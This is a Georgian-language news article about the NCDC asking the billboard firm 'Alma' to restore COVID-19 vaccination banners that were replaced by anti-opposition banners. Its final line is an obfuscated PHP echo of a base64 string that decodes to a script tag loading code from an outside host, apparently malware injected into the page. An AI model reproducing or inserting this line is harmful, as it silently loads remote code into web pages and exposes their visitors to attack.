celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნულმა ცენტრმა სარეკლამო კომპანია “ალმა”, რომელიც დედაქალაქში ბილბორდებს ფლობს, ვაქცინაციის პოპულარიზაციის ბანერის ჩანაცვლებაზე წერილობით მიმართა.
 
წერილში, რომელიც საზოგადოებას დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა ამირან გამყრელიძემ გააცნო, NCDC ვაქცინაციის მნიშვნელობაზე საუბრობს.
 
“კოვიდ-19-ის პანდემიის პირობებში, როდესაც ყოველდღიურად ათასობით ადამიანი ავადდება და ათეულობით იღუპება, ამავდროულად ვაქცინაციის პროცესს კლებადი ტენდენცია აქვს უკანასკნელი დღეების განმავლობაში, საკმაოდ ნეგატიური შედეგი ექნება ვაქცინაციის მხარდამჭერი ბანერის ნებისმიერი სხვა შინაარსის ბანერით ჩანაცვლებას. ამასთანავე, ჩვენს შორის არსებული სახელშეკრულებო პრაქტიკის მიხედვითაც, ბანერების განთავსების ლოკაციის ცვლილებაც შესაძლებელია მხოლოდ მხარეთა წინასწარი შეთანხმებით, რაც ამ კონკრეტულ შემთხვევაში არ მომხდარა. ბანერების შეცვლის თაობაზე ინფორმაციის ქონის შემთხვევაში, ეროვნული ცენტრი ყველა შესაძლო საშუალებას გამოიყენებდა, რათა უპირობოდ გაგრძელებულიყო ბანერების განთავსების ყველა საჭირო ღონისძიება და მომხდარიყო ვაქცინაციის პოპულარიზაცია”, - ნათქვამია წერილში.
 
NCDC “ალმას” მოუწოდებს, უზრუნველყოს გარე ბილბორდებზე ვაქცინაციის მხარდამჭერი ბანერების დაუყოვნებლივ აღდგენა.
 
“ამ შინაარსის წერილი დღეს ოფიციალურა დაეგზავნა კომპანია “ალმას” და მე ძალიან დიდი იმედი მაქვს, რომ ისინი გაითავისებენ იმ დიდ სოციალურ პასუხისმგებლობას, რაც დღეს თითოეულ კომპანიას და ადამიანს აქვს”, - განაცხადა ამირან გამყრელიძემ.
 
თბილისის ქუჩებში ოპოზიციის საწინააღმდეგო, სიძულვილის ენის შემცველი ბანერები გამოჩნდა. 17 სექტემბრის ღამით გამოკრულ ბილბორდებზე წერია ტექსტი “არა ნაცებს! არა ბოროტებას! არა ღალატს!”, წითლად შეღებილ ფონზე კი ოპოზიციური პარტიების წარმომადგენელთა ფოტოები არის დატანილი. “პრაიმთაიმის” ცნობით, იდეის ერთ-ერთი ავტორი და დამფინანსებელი ბიზნესმენი მიხეილ გაბრიაძეა.
963
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");